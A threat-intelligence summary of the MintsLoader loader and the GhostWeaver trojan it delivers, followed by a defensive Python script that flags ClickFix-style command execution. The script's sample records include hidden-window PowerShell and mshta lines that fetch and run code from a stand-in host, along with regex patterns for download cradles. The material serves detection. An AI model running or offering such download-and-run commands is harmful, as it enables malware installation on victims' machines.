MintsLoader is a malware loader that delivers the GhostWeaver remote access trojan through a multi-stage infection chain built from obfuscated JavaScript and PowerShell. It is built to evade analysis and to fetch and execute follow-on payloads, and it reaches victims through phishing campaigns. Affected: organizations in the industrial, legal, and energy sectors.
Keypoints:
- MintsLoader delivers the GhostWeaver trojan using obfuscated JavaScript and PowerShell.
- Uses sandbox-evasion checks, a domain generation algorithm (DGA) for its C2 domains, and HTTP-based command-and-control communications.
- Observed in phishing campaigns targeting the industrial, legal, and energy sectors since early 2023.
- Distributed in conjunction with other e-crime services such as SocGholish and LandUpdate808.
- Relies on social engineering, including ClickFix lures that trick users into running malicious commands themselves.
- Functions primarily as a loader: its job is to download and run follow-on payloads over HTTP.
- GhostWeaver maintains a persistent C2 channel and communicates with its server over TLS.
- Recent campaigns also use ClickFix lures to deploy the Lumma Stealer malware.
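As an added illustration (not code from the original article or from any of the reporting it summarizes), the following Python triage helper flags the execution pattern that ClickFix lures produce on an endpoint: a script host such as powershell.exe or mshta.exe started by explorer.exe (the Run dialog or desktop) with a command line that hides its window and pulls code from a remote URL. The process-creation records, their pipe-delimited field layout, the indicator weights and the threshold are all constructed assumptions for this example; they are not MintsLoader's actual command lines or infrastructure.

```python
"""Flag ClickFix-style command execution in process-creation records.

Added example, not part of the original article. The field layout,
sample events, indicator weights and threshold are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Interpreters a ClickFix lure typically has the victim launch by hand.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# (label, pattern over the command line, weight). Weights are assumptions.
CMDLINE_RULES = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("encoded command",
     re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("policy/profile bypass",
     re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass|-nop(?:rofile)?\b", re.I), 1),
    ("download cradle",
     re.compile(r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|"
                r"invoke-webrequest|downloadstring|curl|certutil)\b", re.I), 3),
    ("remote url", re.compile(r"https?://", re.I), 2),
    ("mshta remote content", re.compile(r"mshta(?:\.exe)?\s+\S*https?://", re.I), 3),
    # Lures commonly append a comment so the pasted text looks like a captcha token.
    ("fake verification comment", re.compile(r"#.*(?:robot|captcha|verification)", re.I), 2),
]


@dataclass
class ProcEvent:
    timestamp: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    """Parse 'timestamp|parent_image|image|command_line' (constructed layout)."""
    ts, parent, image, cmdline = line.split("|", 3)
    return ProcEvent(ts, parent, image, cmdline)


def score_event(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Return (score, reasons). The explorer.exe-parent check is what separates
    a user pasting a lure from an admin script or scheduled task that uses the
    same PowerShell switches."""
    score, reasons = 0, []
    if basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in SCRIPT_HOSTS:
        score += 2
        reasons.append("script host launched interactively from explorer.exe")
    for label, pattern, weight in CMDLINE_RULES:
        if pattern.search(ev.command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def triage(lines, threshold: int = 5):
    """Return (timestamp, score, reasons) for every record at or above threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.timestamp, score, reasons))
    return hits


# Constructed sample records: two ClickFix-style launches, a scheduled-task
# script, a user opening a plain shell, and an unrelated process.
SAMPLE_EVENTS = [
    r'2025-05-01T10:02:13Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell -w hidden -nop -c "iex (irm https://example.invalid/p)" # I am not a robot - reCAPTCHA Verification ID: 7391',
    r'2025-05-01T10:05:40Z|C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta https://example.invalid/check.hta',
    r'2025-05-01T10:07:02Z|C:\Windows\System32\svchost.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|'
    r'powershell -ep bypass -File C:\ProgramData\inventory\collect.ps1',
    r'2025-05-01T10:09:55Z|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell',
    r'2025-05-01T10:11:30Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\alice\notes.txt',
]

if __name__ == "__main__":
    for ts, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{ts} score={score}: {', '.join(reasons)}")
```

Run as a script it prints the two flagged records; the same conditions map directly onto Sysmon Event ID 1 or EDR process-creation telemetry. Because the scheduled-task record has a non-interactive parent, its `-ep bypass` alone scores below the threshold, which keeps routine administrative PowerShell out of the alert queue.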
Read More: https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html